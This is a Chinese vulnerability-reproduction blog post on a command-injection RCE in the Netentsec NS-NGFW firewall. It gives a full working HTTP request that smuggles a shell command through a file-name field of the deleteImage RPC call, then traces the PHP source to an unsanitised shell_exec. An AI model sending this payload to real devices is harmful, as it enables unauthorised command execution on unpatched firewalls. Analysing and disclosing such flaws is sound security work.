网康NS-NGFW防火墙远程RCE 漏洞复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-04-11 11:03

漏洞点在

/directdata/direct/router

具体包如下:

POST /directdata/direct/router HTTP/1.1
Host: 192.168.10.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

然后访问1.txt

代码分析:

首先找到他的入口函数

html\applications\directdata\controllers\DirectController.php

<?php
require_once BASE_PATH.'/applications/Models/Ext/Direct.php';
class Directdata_DirectController extends Zend_Controller_Action {

    function routerAction() {
        header("Content-Type: application/json");
	$this->_helper->viewRenderer->setNoRender();

        $this->getResponse()->setBody(json_encode(
             Ext_Direct::run($this->getRequest())
        ));
    }

}

然后找到Ext_Direct  run 这个函数

	public static function run($request) {
		$extRequest = Ext_Direct_Request::factory($request);
		if (!$extRequest)
			throw new Exception('illegal parameters');
		if (!is_array($extRequest))
			$extRequest = array($extRequest);

		$ret = array();
		$daos = array();
		foreach ($extRequest as $r) {
			$c = $r->getAction();
			if (!$c)
				throw new Exception('class not found');
			if (!isset($daos[$c]))
				$daos[$c] = new $c();
			$dao = $daos[$c];
		//	$argtest = $r->getArguments();
		//	$testInfo =  $r->getMethod().'->'.$argtest[0]->type;
		//	$startTime = micsecond();
// 			Ns_debug_log($dao,'x5.log',false);
			if (!method_exists($dao, $r->getMethod()))
				throw new Exception('method not found');
			try {
				if ($request->getParam('extDirectException'))
					throw new Ext_DirectException($request->extDirectException);
				$ret[] = new Ext_Direct_RPCResult(
					$r->getTID(),
					$r->getAction(),
					$r->getMethod(),
					call_user_func_array(
						array($dao, $r->getMethod()), $r->getArguments()
					)
				);
			} catch (Ext_DirectException $e) {
				$ret[] = new Ext_Direct_ExceptionResult(
					$r->getTID(),
					$r->getAction(),
					$r->getMethod(),
					$e->getMessage()
				);
			} catch (Exception $e) {
				$ret[] = new Ext_Direct_ExceptionResult(
					$r->getTID(),
					$r->getAction(),
					$r->getMethod(),
					$e->getMessage()
				);
			}
		//	Ns_debug_log((micsecond()-$startTime).date('Y-m-d H:i:s').','.$c.','.$testInfo.','.getenv('REMOTE_ADDR'),'fast.log',false);
		}
		return $ret;
	}

这里最终调用的是

					call_user_func_array(
						array($dao, $r->getMethod()), $r->getArguments()
					)

$r->getAction()  这个是从Ext_Direct_Request::factory($request) 这里获取的跟踪一下

public static function factory($request) {
		$data = json_decode(file_get_contents('php://input'));
		if (
				is_object($data) && $data->type && $data->tid && 
				$data->action && $data->method
			)
			return new Ext_Direct_Request(
				$data->type, $data->tid, $data->action, 
				$data->method, $data->data
			);
		else if (is_array($data)) {
			$ret = array();
			foreach ($data as $r) {
				if (
						$r->type && $r->tid && 
						$r->action && $r->method
					)
					$ret[] = new Ext_Direct_Request(
						$r->type, $r->tid, $r->action, 
						$r->method, $r->data
					);
			}
			return $ret;
		} else
			return null;
	}

发现就是传递过来的SSLVPN_Resource  找到这个SSLVPN_Resource 文件 然后调用的方法为deleteImage 

找到deleteImage  方法


	public function deleteImage($params){
		$basePath = '/var/www/html/';
		$imgPath = $this->imagePath;
		$params = $params->data;
		$cmd = "cd $imgPath \n /bin/rm -rf ";
		$existDefault=false;
		foreach ($params as $img){
			if($img=='default.png'){
				$existDefault=true;
			}else{
				$cmd.=$img.' ';
			}
		}
		Ns_debug_log($cmd,'x.log');
		shell_exec($cmd);
		if($existDefault){
			return $this->response(array('failed : default images can not delete!'));
		}
		return $this->response(array());
// 		Ns_debug_log($params,'x.log');
	}

阿这。

再看看其他几个函数


如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注